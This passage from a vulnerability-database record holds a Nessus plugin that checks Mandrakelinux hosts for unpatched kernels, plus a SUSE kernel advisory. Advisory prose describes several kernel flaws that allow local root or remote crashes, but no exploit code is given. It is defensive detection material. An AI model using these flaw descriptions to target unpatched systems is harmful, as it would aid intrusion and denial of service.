Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities are fixed in the 2.4 and 2.6 kernels with\nthis advisory :\n\n - Multiple race conditions in the terminal layer of 2.4\n and 2.6 kernels (prior to 2.6.9) can allow a local\n attacker to obtain portions of kernel data or allow\n remote attackers to cause a kernel panic by switching\n from console to PPP line discipline, then quickly\n sending data that is received during the switch\n (CVE-2004-0814)\n\n - Richard Hart found an integer underflow problem in the\n iptables firewall logging rules that can allow a remote\n attacker to crash the machine by using a specially\n crafted IP packet. This is only possible, however, if\n firewalling is enabled. The problem only affects 2.6\n kernels and was fixed upstream in 2.6.8 (CVE-2004-0816)\n\n - Stefan Esser found several remote DoS confitions in the\n smbfs file system. This could be exploited by a hostile\n SMB server (or an attacker injecting packets into the\n network) to crash the client systems (CVE-2004-0883 and\n CVE-2004-0949)\n\n - Paul Starzetz and Georgi Guninski reported,\n independently, that bad argument handling and bad\n integer arithmetics in the IPv4 sendmsg handling of\n control messages could lead to a local attacker crashing\n the machine. The fixes were done by Herbert Xu\n (CVE-2004-1016)\n\n - Rob Landley discovered a race condition in the handling\n of /proc/.../cmdline where, under rare circumstances, a\n user could read the environment variables of another\n process that was still spawning leading to the potential\n disclosure of sensitive information such as passwords\n (CVE-2004-1058)\n\n - Paul Starzetz reported that the missing serialization in\n unix_dgram_recvmsg() which was added to kernel 2.4.28\n can be used by a local attacker to gain elevated (root)\n privileges (CVE-2004-1068)\n\n - Ross Kendall Axe discovered a possible kernel panic\n (DoS) while sending AF_UNIX network packets if certain\n SELinux-related kernel options were enabled. By default\n the CONFIG_SECURITY_NETWORK and CONFIG_SECURITY_SELINUX\n options are not enabled (CVE-2004-1069)\n\n - Paul Starzetz of isec.pl discovered several issues with\n the error handling of the ELF loader routines in the\n kernel. The fixes were provided by Chris Wright\n (CVE-2004-1070, CVE-2004-1071, CVE-2004-1072,\n CVE-2004-1073)\n\n - It was discovered that hand-crafted a.out binaries could\n be used to trigger a local DoS condition in both the 2.4\n and 2.6 kernels. The fixes were done by Chris Wright\n (CVE-2004-1074)\n\n - Paul Starzetz found bad handling in the IGMP code which\n could lead to a local attacker being able to crash the\n machine. The fix was done by Chris Wright\n (CVE-2004-1137)\n\n - Jeremy Fitzhardinge discovered two buffer overflows in\n the sys32_ni_syscall() and sys32_vm86_warning()\n functions that could be used to overwrite kernel memory\n with attacker-supplied code resulting in privilege\n escalation (CVE-2004-1151)\n\n - Paul Starzetz found locally exploitable flaws in the\n binary format loader's uselib() function that could be\n abused to allow a local user to obtain root privileges\n (CVE-2004-1235)\n\n - Paul Starzetz found an exploitable flaw in the page\n fault handler when running on SMP machines\n (CVE-2005-0001)\n\n - A vulnerability in insert_vm_struct could allow a locla\n user to trigger BUG() when the user created a large vma\n that overlapped with arg pages during exec\n (CVE-2005-0003)\n\n - Paul Starzetz also found a number of vulnerabilities in\n the kernel binfmt_elf loader that could lead a local\n user to obtain elevated (root) privileges\n (isec-0017-binfmt_elf)\n\nThe provided packages are patched to fix these vulnerabilities. All\nusers are encouraged to upgrade to these updated kernels.\n\nTo update your kernel, please follow the directions located at :\n\nhttp://www.mandrakesoft.com/security/kernelupdate\n\nPLEASE NOTE: Mandrakelinux 10.0 users will need to upgrade to the\nlatest module-init-tools package prior to upgrading their kernel.\nLikewise, MNF8.2 users will need to upgrade to the latest modutils\npackage prior to upgrading their kernel.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://isec.pl/en/vulnerabilities/isec-0017-binfmt_elf.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.isec.pl/vulnerabilities/isec-0022-pagefault.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ussg.iu.edu/hypermail/linux/kernel/0411.1/1222.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-2.4.22.41mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-2.4.25.13mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-2.4.28.0.rc1.5mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-2.6.3.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-2.6.8.1.24mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.22.41mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.25.13mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.28.0.rc1.5mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-enterprise-2.6.3.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-enterprise-2.6.8.1.24mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-i586-up-1GB-2.4.28.0.rc1.5mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-i586-up-1GB-2.6.8.1.24mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-i686-up-4GB-2.4.22.41mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-i686-up-4GB-2.4.25.13mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-i686-up-4GB-2.6.3.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-i686-up-64GB-2.6.8.1.24mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-p3-smp-64GB-2.4.22.41mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-p3-smp-64GB-2.4.25.13mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-p3-smp-64GB-2.6.3.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-secure-2.4.22.41mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-secure-2.6.3.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-secure-2.6.8.1.24mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp-2.4.22.41mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp-2.4.25.13mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp-2.4.28.0.rc1.5mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp-2.6.3.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp-2.6.8.1.24mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-2.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-stripped\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-stripped-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:module-init-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", reference:\"kernel-2.4.25.13mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"kernel-2.6.3.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"kernel-enterprise-2.4.25.13mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"kernel-enterprise-2.6.3.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"kernel-i686-up-4GB-2.4.25.13mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"kernel-i686-up-4GB-2.6.3.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"kernel-p3-smp-64GB-2.4.25.13mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"kernel-p3-smp-64GB-2.6.3.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"kernel-secure-2.6.3.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"kernel-smp-2.4.25.13mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"kernel-smp-2.6.3.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"kernel-source-2.4.25-13mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"kernel-source-stripped-2.6.3-25mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"module-init-tools-3.0-1.2.1.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.1\", reference:\"kernel-2.4.28.0.rc1.5mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"kernel-2.6.8.1.24mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"kernel-enterprise-2.4.28.0.rc1.5mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"kernel-enterprise-2.6.8.1.24mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"kernel-i586-up-1GB-2.4.28.0.rc1.5mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"kernel-i586-up-1GB-2.6.8.1.24mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"kernel-i686-up-64GB-2.6.8.1.24mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"kernel-secure-2.6.8.1.24mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"kernel-smp-2.4.28.0.rc1.5mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"kernel-smp-2.6.8.1.24mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"kernel-source-2.4-2.4.28-0.rc1.5mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"kernel-source-2.6-2.6.8.1-24mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"kernel-source-stripped-2.6-2.6.8.1-24mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"kernel-2.4.22.41mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"kernel-enterprise-2.4.22.41mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"kernel-i686-up-4GB-2.4.22.41mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"kernel-p3-smp-64GB-2.4.22.41mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"kernel-secure-2.4.22.41mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"kernel-smp-2.4.22.41mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"kernel-source-2.4.22-41mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:50:47", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "2.6.5-7.111", "packageName": "kernel-bigsmp", "packageFilename": "kernel-bigsmp-2.6.5-7.111.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "2.6.5-7.111", "packageName": "kernel-smp", "packageFilename": "kernel-smp-2.6.5-7.111.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "2.6.5-7.111", "packageName": "kernel-smp", "packageFilename": "kernel-smp-2.6.5-7.111.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "2.6.5-7.111", "packageName": "kernel-default", "packageFilename": "kernel-default-2.6.5-7.111.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "2.6.5-7.111", "packageName": "kernel-default", "packageFilename": "kernel-default-2.6.5-7.111.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "An integer underflow problem in the iptables firewall logging rules can allow a remote attacker to crash the machine by using a handcrafted IP packet. This attack is only possible with firewalling enabled.\n#### Solution\nIf you are not using an iptables based firewall (like SUSEfirewall2) on your system, you are not affected. If you are using a firewall, a workaround is to disable firewall logging of IP and TCP options. We recommend to update the kernel.", "edition": 1, "reporter": "Suse", "published": "2004-10-21T07:52:50", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "title": "remote denial of service in kernel", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0955", "CVE-2004-0887", "CVE-2004-0804", "CVE-2004-0884", "CVE-2004-0803", "CVE-2004-0954", "CVE-2004-0816", "CVE-2004-0886"], "modified": "2004-10-21T07:52:50", "id": "SUSE-SA:2004:037", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-10/msg00007.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}